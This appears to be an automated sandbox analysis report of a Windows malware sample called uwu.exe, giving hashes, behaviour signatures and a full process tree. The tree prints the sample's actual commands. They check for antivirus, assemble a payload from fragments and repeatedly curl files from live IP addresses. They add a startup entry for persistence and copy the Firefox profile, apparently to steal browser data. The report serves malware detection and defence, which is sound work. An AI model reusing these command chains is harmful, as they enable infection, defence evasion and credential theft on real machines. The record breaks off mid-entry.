Analysis

max time kernel: 150s
max time network: 155s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 12/11/2024, 16:39

Static task: static1
Behavioral task: behavioral1
Sample: uwu.exe
Resource: win7-20240708-en

General

Target: uwu.exe
Size: 1.0MB
MD5: fc877cda1618318751789044fb01a6bd
SHA1: 15f90c8f5c543964a33d62d6e68f62a6d2712262
SHA256: ec059d014e9208dceded5ce614ea4f95e26c1ed45ad81ce5de348e5df7647197
SHA512: b96c3148e98b089ce25b1a2987df24f87bd0e7cd312ee9dc270ce3d6dacc48276213f313c162dc721440410c2ca1a265fd54eea546095a2cafbe2a34cac912d4
SSDEEP: 24576:ruPaNmFtZU7DPNqRLhVVOgHD/raiDhFDsoUCcjL:NQzUvPNakGbD/soUdjL
Malware Config
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoCs)
  description | pid | Process | procid_target
  PID 1208 created 3536 | 1208 | Crossword.pif | 56

Checks computer location settings (2 TTPs, 4 IoCs)
Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | Either.pif
  Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | uwu.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | Crossword.pif
  Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | RevenueDevices.exe

Drops startup file (2 IoCs)
  description | ioc | Process
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url | cmd.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url | cmd.exe

Executes dropped EXE (6 IoCs)
  pid | Process
  1208 | Crossword.pif
  4528 | azvw.exe
  4872 | RevenueDevices.exe
  2412 | Either.pif
  3864 | azvw.exe
  4312 | 7za.exe

Loads dropped DLL (1 IoCs)
  pid | Process
  2412 | Either.pif

Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Enumerates processes with tasklist (1 TTPs, 4 IoCs)
  pid | Process
  968 | tasklist.exe
  4204 | tasklist.exe
  2824 | tasklist.exe
  436 | tasklist.exe

Drops file in Windows directory (7 IoCs)
  description | ioc | Process
  File opened for modification | C:\Windows\BrushSub | RevenueDevices.exe
  File opened for modification | C:\Windows\McLol | RevenueDevices.exe
  File opened for modification | C:\Windows\SoilOasis | uwu.exe
  File opened for modification | C:\Windows\RebatesPalm | uwu.exe
  File opened for modification | C:\Windows\DouglasWind | uwu.exe
  File opened for modification | C:\Windows\TmpMoon | RevenueDevices.exe
  File opened for modification | C:\Windows\NotifiedAaron | RevenueDevices.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTPs, 64 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description | ioc | Process (number of entries)
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe (50)
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe (4)
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | schtasks.exe (3)
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | findstr.exe (2)
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | azvw.exe (1)
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Either.pif (1)
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WMIC.exe (1)
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 7za.exe (1)
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Crossword.pif (1)

System Network Configuration Discovery: Internet Connection Discovery (1 TTPs, 2 IoCs)
Adversaries may check for Internet connectivity on compromised systems.
  pid | Process
  2372 | cmd.exe
  2072 | Robocopy.exe

Gathers system information (1 TTPs, 1 IoCs)
Runs systeminfo.exe.
  pid | Process
  460 | systeminfo.exe

Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid | Process
  1208 | Crossword.pif (the same entry is recorded 64 times)

Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
  pid | Process
  1208 | Crossword.pif

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  pid | Process | Token(s)
  2824 | tasklist.exe | SeDebugPrivilege
  436 | tasklist.exe | SeDebugPrivilege
  4320 | WMIC.exe | SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (this whole sequence is recorded twice)
  1208 | Crossword.pif | 33, SeIncBasePriorityPrivilege (recorded five times each)
  968 | tasklist.exe | SeDebugPrivilege
  4204 | tasklist.exe | SeDebugPrivilege
  2072 | Robocopy.exe | SeBackupPrivilege, SeRestorePrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege
  4312 | 7za.exe | SeRestorePrivilege, 35, SeSecurityPrivilege (recorded twice)

Suspicious use of FindShellTrayWindow (6 IoCs)
  pid | Process
  1208 | Crossword.pif (recorded three times)
  2412 | Either.pif (recorded three times)

Suspicious use of SendNotifyMessage (6 IoCs)
  pid | Process
  1208 | Crossword.pif (recorded three times)
  2412 | Either.pif (recorded three times)

Suspicious use of SetWindowsHookEx (1 IoCs)
  pid | Process
  2412 | Either.pif

Suspicious use of WriteProcessMemory (64 IoCs)
Every row below is recorded three times in the sandbox output; the 64-entry list is cut off after the first occurrence of the last row.
  description | pid | Process | procid_target
  PID 3544 wrote to memory of 1416 | 3544 | uwu.exe | 85
  PID 1416 wrote to memory of 2824 | 1416 | cmd.exe | 93
  PID 1416 wrote to memory of 2284 | 1416 | cmd.exe | 94
  PID 1416 wrote to memory of 436 | 1416 | cmd.exe | 95
  PID 1416 wrote to memory of 2272 | 1416 | cmd.exe | 96
  PID 1416 wrote to memory of 372 | 1416 | cmd.exe | 97
  PID 1416 wrote to memory of 3700 | 1416 | cmd.exe | 98
  PID 1416 wrote to memory of 1180 | 1416 | cmd.exe | 99
  PID 1416 wrote to memory of 1208 | 1416 | cmd.exe | 100
  PID 1416 wrote to memory of 2516 | 1416 | cmd.exe | 101
  PID 1208 wrote to memory of 1756 | 1208 | Crossword.pif | 102
  PID 1208 wrote to memory of 1720 | 1208 | Crossword.pif | 107
  PID 1720 wrote to memory of 4320 | 1720 | cmd.exe | 109
  PID 1208 wrote to memory of 3040 | 1208 | Crossword.pif | 111
  PID 1208 wrote to memory of 2824 | 1208 | Crossword.pif | 113
  PID 2824 wrote to memory of 2272 | 2824 | cmd.exe | 115
  PID 1208 wrote to memory of 5012 | 1208 | Crossword.pif | 117
  PID 5012 wrote to memory of 2024 | 5012 | cmd.exe | 119
  PID 1208 wrote to memory of 1460 | 1208 | Crossword.pif | 120
  PID 1460 wrote to memory of 4932 | 1460 | cmd.exe | 122
  PID 1208 wrote to memory of 3432 | 1208 | Crossword.pif | 123
  PID 3432 wrote to memory of 1400 | 3432 | cmd.exe | 125
Processes
(each process is indented under its parent; the image path is followed by the PID, the command line and the signatures it triggered)

C:\Windows\Explorer.EXE  (PID 3536)
  cmdline: C:\Windows\Explorer.EXE
    C:\Users\Admin\AppData\Local\Temp\uwu.exe  (PID 3544)
      cmdline: "C:\Users\Admin\AppData\Local\Temp\uwu.exe"
      - Checks computer location settings
      - Drops file in Windows directory
      - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\cmd.exe  (PID 1416)
          cmdline: "C:\Windows\System32\cmd.exe" /c copy Tuition Tuition.cmd & Tuition.cmd
          - System Location Discovery: System Language Discovery
          - Suspicious use of WriteProcessMemory
            C:\Windows\SysWOW64\tasklist.exe  (PID 2824)
              cmdline: tasklist
              - Enumerates processes with tasklist
              - Suspicious use of AdjustPrivilegeToken
            C:\Windows\SysWOW64\findstr.exe  (PID 2284)
              cmdline: findstr /I "wrsa opssvc"
            C:\Windows\SysWOW64\tasklist.exe  (PID 436)
              cmdline: tasklist
              - Enumerates processes with tasklist
              - Suspicious use of AdjustPrivilegeToken
            C:\Windows\SysWOW64\findstr.exe  (PID 2272)
              cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
              - System Location Discovery: System Language Discovery
            C:\Windows\SysWOW64\cmd.exe  (PID 372)
              cmdline: cmd /c md 226443
              - System Location Discovery: System Language Discovery
            C:\Windows\SysWOW64\findstr.exe  (PID 3700)
              cmdline: findstr /V "AthleticsTabletsUserImaging" Slovenia
            C:\Windows\SysWOW64\cmd.exe  (PID 1180)
              cmdline: cmd /c copy /b ..\Tackle + ..\Heather + ..\Column + ..\Environment + ..\Events + ..\Merit + ..\Law + ..\Explanation d
              - System Location Discovery: System Language Discovery
            C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif  (PID 1208)
              cmdline: Crossword.pif d
              - Suspicious use of NtCreateUserProcessOtherParentProcess
              - Checks computer location settings
              - Executes dropped EXE
              - System Location Discovery: System Language Discovery
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious behavior: GetForegroundWindowSpam
              - Suspicious use of AdjustPrivilegeToken
              - Suspicious use of FindShellTrayWindow
              - Suspicious use of SendNotifyMessage
              - Suspicious use of WriteProcessMemory
                C:\Windows\SysWOW64\cmd.exe  (PID 1720)
                  cmdline: "C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\Admin\AppData\Local\temp\699 2>&1
                  - System Location Discovery: System Language Discovery
                  - Suspicious use of WriteProcessMemory
                    C:\Windows\SysWOW64\Wbem\WMIC.exe  (PID 4320)
                      cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
                      - System Location Discovery: System Language Discovery
                      - Suspicious use of AdjustPrivilegeToken
                C:\Windows\SysWOW64\cmd.exe  (PID 3040)
                  cmdline: "C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\temp\699 > C:\Users\Admin\AppData\Local\temp\457
                C:\Windows\SysWOW64\cmd.exe  (PID 2824)
                  cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\jfhcn" "178.215.224.252/v10/ukyh.php?jspo=6"
                  - System Location Discovery: System Language Discovery
                  - Suspicious use of WriteProcessMemory
                    C:\Windows\SysWOW64\curl.exe  (PID 2272)
                      cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\jfhcn" "178.215.224.252/v10/ukyh.php?jspo=6"
                C:\Windows\SysWOW64\cmd.exe  (PID 5012)
                  cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\eofub" "178.215.224.74/v10/ukyh.php?jspo=6"
                  - Suspicious use of WriteProcessMemory
                    C:\Windows\SysWOW64\curl.exe  (PID 2024)
                      cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\eofub" "178.215.224.74/v10/ukyh.php?jspo=6"
                C:\Windows\SysWOW64\cmd.exe  (PID 1460)
                  cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bjpcn" "178.215.224.74/v10/ukyh.php?jspo=5"
                  - System Location Discovery: System Language Discovery
                  - Suspicious use of WriteProcessMemory
                    C:\Windows\SysWOW64\curl.exe  (PID 4932)
                      cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\bjpcn" "178.215.224.74/v10/ukyh.php?jspo=5"
                C:\Windows\SysWOW64\cmd.exe  (PID 3432)
                  cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ijxif" "178.215.224.74/v10/ukyh.php?jspo=6"
                  - Suspicious use of WriteProcessMemory
                    C:\Windows\SysWOW64\curl.exe  (PID 1400)
                      cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\ijxif" "178.215.224.74/v10/ukyh.php?jspo=6"
                C:\Windows\SysWOW64\cmd.exe  (PID 4712)
                  cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lvlyl" "178.215.224.74/v10/ukyh.php?jspo=6"
                    C:\Windows\SysWOW64\curl.exe  (PID 2828)
                      cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\lvlyl" "178.215.224.74/v10/ukyh.php?jspo=6"
                C:\Windows\SysWOW64\cmd.exe  (PID 3248)
                  cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\eaonl" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
                    C:\Windows\SysWOW64\curl.exe  (PID 5036)
                      cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\eaonl" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
                C:\Windows\SysWOW64\cmd.exe  (PID 2932)
                  cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\nqpzx" "178.215.224.74/v10/ukyh.php?jspo=6"
                  - System Location Discovery: System Language Discovery
                    C:\Windows\SysWOW64\curl.exe  (PID 532)
                      cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\nqpzx" "178.215.224.74/v10/ukyh.php?jspo=6"
                C:\Windows\SysWOW64\cmd.exe  (PID 2564)
                  cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xvwoz" "178.215.224.74/v10/ukyh.php?jspo=6"
                    C:\Windows\SysWOW64\curl.exe  (PID 2316)
                      cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\xvwoz" "178.215.224.74/v10/ukyh.php?jspo=6"
                C:\Windows\SysWOW64\cmd.exe  (PID 4036)
                  cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xjpyn" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
                  - System Location Discovery: System Language Discovery
                    C:\Windows\SysWOW64\curl.exe  (PID 1912)
                      cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\xjpyn" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
                C:\Windows\SysWOW64\cmd.exe  (PID 3444)
                  cmdline: "C:\Windows\System32\cmd.exe" /C cd "C:\Users\Admin\AppData\Roaming\DolphinDumps" & azvw.exe -o xhwq.zip
                  - System Location Discovery: System Language Discovery
                    C:\Users\Admin\AppData\Roaming\DolphinDumps\azvw.exe  (PID 4528)
                      cmdline: azvw.exe -o xhwq.zip
                      - Executes dropped EXE
                      - System Location Discovery: System Language Discovery
                C:\Windows\SysWOW64\cmd.exe  (PID 4216)
                  cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\mfiuw" "178.215.224.74/v10/ukyh.php?jspo=6"
                    C:\Windows\SysWOW64\curl.exe  (PID 4316)
                      cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\mfiuw" "178.215.224.74/v10/ukyh.php?jspo=6"
                C:\Windows\SysWOW64\cmd.exe  (PID 4428)
                  cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\khxas" "178.215.224.74/v10/ukyh.php?jspo=31"
                  - System Location Discovery: System Language Discovery
                    C:\Windows\SysWOW64\curl.exe  (PID 3040)
                      cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\khxas" "178.215.224.74/v10/ukyh.php?jspo=31"
                C:\Windows\SysWOW64\cmd.exe  (PID 1580)
                  cmdline: "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\Admin\AppData\Roaming\DolphinDumps\jvx 2>&1
                  - System Location Discovery: System Language Discovery
                    C:\Windows\SysWOW64\systeminfo.exe  (PID 460)
                      cmdline: systeminfo
                      - Gathers system information
                    C:\Windows\SysWOW64\findstr.exe  (PID 1924)
                      cmdline: findstr /C:"OS Name"
                C:\Windows\SysWOW64\cmd.exe  (PID 4052)
                  cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\mfjsk" "178.215.224.74/v10/ukyh.php?jspo=6"
                  - System Location Discovery: System Language Discovery
                    C:\Windows\SysWOW64\curl.exe  (PID 1324)
                      cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\mfjsk" "178.215.224.74/v10/ukyh.php?jspo=6"
                C:\Windows\SysWOW64\cmd.exe  (PID 3296)
                  cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\gnaze" "178.215.224.74/v10/ukyh.php?jspo=6"
                  - System Location Discovery: System Language Discovery
                    C:\Windows\SysWOW64\curl.exe  (PID 2980)
                      cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\gnaze" "178.215.224.74/v10/ukyh.php?jspo=6"
                C:\Windows\SysWOW64\cmd.exe  (PID 436)
                  cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wasxo" "178.215.224.74/v10/ukyh.php?jspo=7"
                    C:\Windows\SysWOW64\curl.exe  (PID 1280)
                      cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\wasxo" "178.215.224.74/v10/ukyh.php?jspo=7"
                C:\Windows\SysWOW64\cmd.exe  (PID 4372)
                  cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xiaij" "178.215.224.74/v10/ukyh.php?jspo=6"
                    C:\Windows\SysWOW64\curl.exe  (PID 4160)
                      cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\xiaij" "178.215.224.74/v10/ukyh.php?jspo=6"
                C:\Windows\SysWOW64\cmd.exe  (PID 3436)
                  cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bhgyc" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
                  - System Location Discovery: System Language Discovery
                    C:\Windows\SysWOW64\curl.exe  (PID 3176)
                      cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\bhgyc" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
                C:\Windows\SysWOW64\cmd.exe  (PID 5024)
                  cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\kypzx" "178.215.224.74/v10/ukyh.php?jspo=6"
                  - System Location Discovery: System Language Discovery
                    C:\Windows\SysWOW64\curl.exe  (PID 660)
                      cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\kypzx" "178.215.224.74/v10/ukyh.php?jspo=6"
                C:\Windows\SysWOW64\cmd.exe  (PID 4280)
                  cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lmhjs" "178.215.224.74/v10/ukyh.php?jspo=6"
                    C:\Windows\SysWOW64\curl.exe  (PID 1708)
                      cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\lmhjs" "178.215.224.74/v10/ukyh.php?jspo=6"
                C:\Windows\SysWOW64\cmd.exe  (PID 4128)
                  cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\nbpfi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
                  - System Location Discovery: System Language Discovery
                    C:\Windows\SysWOW64\curl.exe  (PID 3184)
                      cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\nbpfi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
                C:\Users\Admin\AppData\Local\temp\RevenueDevices.exe  (PID 4872)
                  cmdline: "C:\Users\Admin\AppData\Local\temp\RevenueDevices.exe"
                  - Checks computer location settings
                  - Executes dropped EXE
                  - Drops file in Windows directory
                    C:\Windows\SysWOW64\cmd.exe  (PID 512)
                      cmdline: "C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd
                        C:\Windows\SysWOW64\tasklist.exe  (PID 968)
                          cmdline: tasklist
                          - Enumerates processes with tasklist
                          - Suspicious use of AdjustPrivilegeToken
                        C:\Windows\SysWOW64\findstr.exe  (PID 2980)
                          cmdline: findstr /I "wrsa opssvc"
                        C:\Windows\SysWOW64\tasklist.exe  (PID 4204)
                          cmdline: tasklist
                          - Enumerates processes with tasklist
                          - Suspicious use of AdjustPrivilegeToken
                        C:\Windows\SysWOW64\findstr.exe  (PID 3624)
                          cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                          - System Location Discovery: System Language Discovery
                        C:\Windows\SysWOW64\cmd.exe  (PID 2264)
                          cmdline: cmd /c md 303482
                          - System Location Discovery: System Language Discovery
                        C:\Windows\SysWOW64\findstr.exe  (PID 1180)
                          cmdline: findstr /V "OVERTOOLBARALOTNHL" Weeks
                        C:\Windows\SysWOW64\cmd.exe  (PID 920)
                          cmdline: cmd /c copy /b ..\Norman + ..\Eight + ..\Considerations + ..\Bailey + ..\Parts + ..\Showcase + ..\Samples + ..\Shepherd + ..\Subsection f
                        C:\Users\Admin\AppData\Local\Temp\303482\Either.pif  (PID 2412)
                          cmdline: Either.pif f
                          - Checks computer location settings
                          - Executes dropped EXE
                          - Loads dropped DLL
                          - System Location Discovery: System Language Discovery
                          - Suspicious use of FindShellTrayWindow
                          - Suspicious use of SendNotifyMessage
                          - Suspicious use of SetWindowsHookEx
                            C:\Windows\SysWOW64\cmd.exe  (PID 5048)
                              cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\kyngx" "178.215.224.252/v10/ukyh.php?jspo=6"
                              - System Location Discovery: System Language Discovery
                                C:\Windows\SysWOW64\curl.exe  (PID 4628)
                                  cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\kyngx" "178.215.224.252/v10/ukyh.php?jspo=6"
                            C:\Windows\SysWOW64\cmd.exe  (PID 3556)
                              cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xgcrd" "178.215.224.74/v10/ukyh.php?jspo=6"
                              - System Location Discovery: System Language Discovery
                                C:\Windows\SysWOW64\curl.exe  (PID 1568)
                                  cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\xgcrd" "178.215.224.74/v10/ukyh.php?jspo=6"
                            C:\Windows\SysWOW64\cmd.exe  (PID 3432)
                              cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bwzkv" "178.215.224.74/v10/ukyh.php?jspo=6"
                                C:\Windows\SysWOW64\curl.exe  (PID 648)
                                  cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\bwzkv" "178.215.224.74/v10/ukyh.php?jspo=6"
                            C:\Windows\SysWOW64\cmd.exe  (PID 940)
                              cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\tapmx" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D"
                              - System Location Discovery: System Language Discovery
                                C:\Windows\SysWOW64\curl.exe  (PID 4040)
                                  cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\tapmx" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D"
                            C:\Windows\SysWOW64\cmd.exe  (PID 4456)
                              cmdline: "C:\Windows\System32\cmd.exe" /C cd "C:\Users\Admin\AppData\Roaming\DolphinDumps" & azvw.exe -o qyup.zip
                                C:\Users\Admin\AppData\Roaming\DolphinDumps\azvw.exe  (PID 3864)
                                  cmdline: azvw.exe -o qyup.zip
                                  - Executes dropped EXE
                            C:\Windows\SysWOW64\cmd.exe  (PID 4964)
                              cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lnntu" "178.215.224.74/v10/ukyh.php?jspo=6"
                                C:\Windows\SysWOW64\curl.exe  (PID 4904)
                                  cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\lnntu" "178.215.224.74/v10/ukyh.php?jspo=6"
                            C:\Windows\SysWOW64\cmd.exe  (PID 4100)
                              cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\rxhjz" "178.215.224.74/v10/ukyh.php?jspo=6"
                                C:\Windows\SysWOW64\curl.exe  (PID 3232)
                                  cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\rxhjz" "178.215.224.74/v10/ukyh.php?jspo=6"
                            C:\Windows\SysWOW64\cmd.exe  (PID 4976)
                              cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\pcmfo" "178.215.224.74/v10/ukyh.php?jspo=8"
                                C:\Windows\SysWOW64\curl.exe  (PID 4700)
                                  cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\pcmfo" "178.215.224.74/v10/ukyh.php?jspo=8"
                            C:\Windows\SysWOW64\cmd.exe  (PID 4704)
                              cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\smoqi" "178.215.224.74/v10/ukyh.php?jspo=6"
                                C:\Windows\SysWOW64\curl.exe  (PID 2796)
                                  cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\smoqi" "178.215.224.74/v10/ukyh.php?jspo=6"
                            C:\Windows\SysWOW64\cmd.exe  (PID 1604)
                              cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fbjwi" "178.215.224.74/v10/ukyh.php?jspo=2021&jwvs=3A78C5703B2D9750556C36A3F42A4C"
                              - System Location Discovery: System Language Discovery
                                C:\Windows\SysWOW64\curl.exe  (PID 2756)
                                  cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\fbjwi" "178.215.224.74/v10/ukyh.php?jspo=2021&jwvs=3A78C5703B2D9750556C36A3F42A4C"
                            C:\Windows\SysWOW64\cmd.exe  (PID 4776)
                              cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wziuy" "178.215.224.74/v10/ukyh.php?jspo=6"
                                C:\Windows\SysWOW64\curl.exe  (PID 2292)
                                  cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\wziuy" "178.215.224.74/v10/ukyh.php?jspo=6"
                            C:\Windows\SysWOW64\cmd.exe  (PID 4952)
                              cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xbwcs" "178.215.224.74/v10/ukyh.php?jspo=6"
                              - System Location Discovery: System Language Discovery
                                C:\Windows\SysWOW64\curl.exe  (PID 996)
                                  cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\xbwcs" "178.215.224.74/v10/ukyh.php?jspo=6"
                            C:\Windows\SysWOW64\cmd.exe  (PID 2372)
                              cmdline: "C:\Windows\System32\cmd.exe" /C robocopy "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy" /E /XF *.lock favicons.sqlite favicons.sqlite-shm favicons.sqlite-wal /XD "Background Tasks Profiles" "Pending Pings" "Crash Reports" bookmarkbackups browser-extension-data features personality-provider settings crashes datareporting extensions minidumps saved-telemetry-pings security_state sessionstore-backups storage weave gmp-widevinecdm gmp-gmpopenh264
                              - System Network Configuration Discovery: Internet Connection Discovery
                                C:\Windows\SysWOW64\Robocopy.exe  (PID 2072)
                                  cmdline: robocopy "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy" /E /XF *.lock favicons.sqlite favicons.sqlite-shm favicons.sqlite-wal /XD "Background Tasks Profiles" "Pending Pings" "Crash Reports" bookmarkbackups browser-extension-data features personality-provider settings crashes datareporting extensions minidumps saved-telemetry-pings security_state sessionstore-backups storage weave gmp-widevinecdm gmp-gmpopenh264
                                  - System Network Configuration Discovery: Internet Connection Discovery
                                  - Suspicious use of AdjustPrivilegeToken
                            C:\Windows\SysWOW64\cmd.exe  (PID 3780)
                              cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vlkbr" "178.215.224.74/v10/ukyh.php?jspo=6"
                                C:\Windows\SysWOW64\curl.exe  (PID 1460)
                                  cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\vlkbr" "178.215.224.74/v10/ukyh.php?jspo=6"
                            C:\Windows\SysWOW64\cmd.exe  (PID 4204)
